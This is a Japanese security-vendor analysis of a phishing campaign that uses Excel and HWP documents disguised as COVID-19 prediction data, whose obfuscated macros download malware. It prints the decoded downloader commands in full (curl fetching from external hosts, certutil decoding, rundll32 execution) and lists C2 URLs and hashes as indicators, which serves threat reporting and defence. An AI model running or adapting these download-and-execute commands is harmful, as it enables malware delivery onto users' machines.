COVID-19の予測結果に偽装した不正な文書(xls)が拡散中

今年、COVID-19 に関連したテーマのマルウェアが絶えず発見されているなか、今回も AhnLab ASEC 分析チームでは「COVID-19予測結果」に関する内容でユーザーを騙し、メールと文書を閲覧するように誘導した攻撃を確認した。フィッシングメールを通じて出回っており、このメールには不正なExcel文書が添付されている。  

添付された不正な Excel ファイルは国別の COVID-19 の感染者および死亡者の数を確認できる内容が含まれており、特に累積死亡者の人数確認を希望するユーザーは、Excel 内部にある計算ボタン(「Predict」)を選択するために、マクロ機能を有効化するボタンを選択するしかない。

[図1] マクロ有効化の誘導

しかし、この累積計算を実行する正常なマクロコードの下位には不正なファイルをダウンロードする難読化されたコードが含まれている。このコードを復号化したあと、CMD コマンドを確認できる。

[図2] 難読化されたコードの復号化
  • 不正な Excel 内部の CMD コマンド

cmd /c curl “http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php” -o “%temp%\1.tmp”&certutil -decode “%temp%\1.tmp” “%temp%\lk.tmp”&cmd /c del “%temp%\1.tmp”

[図3] 当社 RAPIT システムで確認できるプロセスツリー構造

現在はダウンロードされないため追加のマルウェアの機能については確認が不可能だが、上記コマンドから確認できるように「certutil –decode」を使用するものと見られ、BASE64 にエンコードされたファイルがダウンロードされ、そのコードでデコードしたあとに動作するものと思われる。

さらに、AhnLab ASEC 分析チームではこのような形式の動作方式を利用したマルウェアの拡散が HWP ファイルでも行われている状況を確認した。その内容を以下に追加で説明する。

当社のインフラを通じて以下のように HWP、アレアハングルファイルから特定のネットワークでマルウェアのダウンロードを試みるログを確認できるが、上記の Excel ファイルと類似したアドレス形式でアクセスを試みる。

[図4] ログ1
[図5] ログ2
[図6] ログ3
[図7] 不正なメールでダウンロードされる画像ファイル

不正なメールからダウンロードした画像ファイルは、上記のように COVID-19 と関連する画像であり、これにも類似性を見出すことができ、この HWP ファイルが確認されたシステム内の不正な DLL が実行する CMD コマンドも、Excel ファイルと類似していることがわかる。

  • 不正な DLL 内部の CMD コマンド

cmd.exe /c curl “https://www.cooper9.com/wp-content/uploads/js_composer/temp/category.php” -o a.b&certutil -decode a.b acview.dll&del a.b&rundll32 acview.dll,fZ2mCzDy

このように、ソーシャル・エンジニアリングの手法を用いて、不正な文書がメールを含む様々な経路で継続的に出回っており、ユーザーは出所が不明な文書の閲覧に注意しなければならない。

現在 V3 では、このような不正なファイルを次のような診断名で診断している。

  • Trojan/XLS.Agent (2020.07.13.05)
  • Trojan/Win32.Hwdoor.C4160390 (2020.07.15.00)

[関連IOC情報]

  • C2 

    hxxp://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php

    hxxps://www.cooper9.com/wp-content/uploads/js_composer/temp/category.php

    hxxp://peoplepowerexchange.com/wp-content/uploads/js_composer/mailchimpery/category.php?uid=0&udx=135fd4148d69841e14422c2e54023b1d

    hxxp://healthtekpak.com/wp-content/uploads/mailchimp/category.php?uid=0&udx=e24ccd3d9410592a3e86f0a90d2b9204

    hxxp://lespetitsmotsdeslibraires.fr/wp-content/plugins/wysija-newsletters/temp/category.php?uid=0&udx=c50cc95a9a02da938ccda79f28c6472b
  • HASH

    268efe92a6e16c89e62bf0c32113d0c9

    41143874a935fb60bcd4e73a2540f8fb
0 0 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments